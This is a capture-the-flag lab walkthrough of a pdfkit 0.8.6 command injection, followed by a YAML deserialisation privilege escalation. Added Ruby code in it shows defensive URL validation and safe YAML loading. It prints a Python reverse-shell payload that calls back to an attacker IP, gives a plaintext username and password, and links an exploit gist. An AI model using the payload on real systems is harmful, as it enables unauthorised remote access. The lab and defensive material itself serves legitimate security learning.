Nmap Scanning
Add website to hosts file:
Open the web service
This website takes a web page URL and converts it into a PDF.
Examining the generated PDF shows that it was produced with pdfkit v0.8.6.
Searching for that version turns up a known vulnerability.
Studying the PoC shows that the URL parameter can be abused to achieve remote code execution.
Let's try it with the command whoami.
Let's use the payload below to gain remote access.
http://10.10.14.22/?name=%20' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.22",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")"
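The root cause here is a caller-supplied URL that reaches a shell command string intact, so quotes, backticks or a space inside it change what the shell runs. As an added defensive example (my own code, not pdfkit's and not part of the original write-up), the Ruby below shows the two layers a converter service should have: a strict allow-list on the submitted URL, and array-form process spawning so no shell ever parses it. It assumes wkhtmltopdf as the backend and uses hypothetical helper names.

```ruby
require "uri"

# Added defensive example (not pdfkit's code and not part of the original
# write-up): validate a user-supplied page URL before handing it to an
# HTML-to-PDF converter, and spawn the converter without a shell.

ALLOWED_SCHEMES = %w[http https].freeze

# Characters that have no business in a percent-encoded page URL but that a
# shell would interpret (quotes, backtick, backslash, redirection, pipe,
# whitespace, command substitution). Legitimate clients percent-encode
# these, so rejecting the raw forms costs nothing.
SHELL_METACHARS = /[`"'\\|<>\s]|\$\(/

# Return true only for an absolute http(s) URL with a host and no shell
# metacharacters. Anything URI.parse cannot parse is rejected as well.
def safe_pdf_url?(raw)
  return false unless raw.is_a?(String) && !raw.empty?
  return false if raw.match?(SHELL_METACHARS)
  uri = URI.parse(raw)
  return false unless ALLOWED_SCHEMES.include?(uri.scheme)
  return false if uri.host.nil? || uri.host.empty?
  true
rescue URI::InvalidURIError
  false
end

# Build the converter command as an argv array. Passing an array to
# Open3.capture3 / Process.spawn hands each element straight to the program,
# so the URL is one literal argument and never goes through /bin/sh.
# (wkhtmltopdf is assumed as the converter, as it is for pdfkit; "-" tells
# it to write the PDF to stdout.)
def converter_argv(url, out_path = "-")
  raise ArgumentError, "refusing to render #{url.inspect}" unless safe_pdf_url?(url)
  ["wkhtmltopdf", "--quiet", url, out_path]
end

if $PROGRAM_NAME == __FILE__
  # Constructed sample inputs: one legitimate URL, three that must be refused.
  [
    "https://example.com/report?id=42&format=full",
    "http://example.com/?q=`date`",
    "http://example.com/?name= something",
    "ftp://example.com/file",
  ].each do |s|
    puts format("%-7s %s", safe_pdf_url?(s) ? "ACCEPT" : "REJECT", s)
  end
end
```

The metacharacter regex is deliberately stricter than RFC 3986 requires; a client that really needs a quote or space in a query string can percent-encode it, and the converter is the only consumer downstream, so nothing legitimate is lost.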
While enumerating the box we found a file containing a username and password.
henry:Q3c1AqGHtoI0aXAYFH
User Flag
We logged in with those credentials and, after further enumeration, found the user flag.
Privilege Escalation
Running sudo -l gave the following results:
https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565#file-ruby_yaml_load_sploit2-yaml
Using the gist linked above, we modified the dependencies.yml file and obtained root access.
Upon enumeration we got the root flag.
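The escalation works because the script loaded dependencies.yml with an unrestricted YAML loader, which lets a tagged document instantiate arbitrary Ruby objects. As an added defensive example (my own code, not the script from the box and not part of the original write-up), here is how that manifest should be read with YAML.safe_load; the sample manifests are constructed and the helper names are hypothetical.

```ruby
require "yaml"

# Added defensive example (not the script from the box and not part of the
# original write-up): read a dependencies manifest with YAML.safe_load so the
# document can only produce plain data, never live Ruby objects.
#
# YAML.load in older Psych releases (Ruby < 3.1) instantiates whatever class
# a !ruby/object tag names, which is the unsafe-deserialisation primitive the
# linked gist relies on. safe_load restricts the result to Hash, Array,
# String, Integer, Float, true/false/nil and raises on any tagged class.

# Constructed manifest in the shape the write-up describes (gem => version).
MANIFEST_OK = <<~YAML
  pdfkit: 0.8.6
  nokogiri: 1.13.3
YAML

# Constructed document carrying an object tag; safe_load must refuse it.
MANIFEST_TAGGED = <<~YAML
  --- !ruby/object:Gem::Requirement
  requirements: []
YAML

VERSION_RE = /\A\d+(\.\d+)*\z/

# Parse the manifest and return a Hash of gem name => version string.
# Raises Psych::DisallowedClass on tagged objects and ArgumentError on any
# shape other than a flat name => version mapping.
def load_dependencies(text)
  data = YAML.safe_load(text, permitted_classes: [], aliases: false)
  raise ArgumentError, "manifest must be a mapping of name => version" unless data.is_a?(Hash)
  data.each_with_object({}) do |(name, version), deps|
    raise ArgumentError, "bad gem name #{name.inspect}" unless name.is_a?(String) && name.match?(/\A[\w\-]+\z/)
    v = version.to_s
    raise ArgumentError, "bad version for #{name}: #{v.inspect}" unless v.match?(VERSION_RE)
    deps[name] = v
  end
end

# Convenience predicate for callers that only need a yes/no answer.
def safe_manifest?(text)
  load_dependencies(text)
  true
rescue Psych::Exception, ArgumentError
  false
end

if $PROGRAM_NAME == __FILE__
  p load_dependencies(MANIFEST_OK)
  puts "tagged manifest accepted? #{safe_manifest?(MANIFEST_TAGGED)}"
end
```

On Ruby 3.1 and later YAML.load already delegates to safe_load, but a script that must run on older interpreters should call safe_load explicitly; the shape check after parsing is what turns "some plain data" into "the manifest this script expects".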
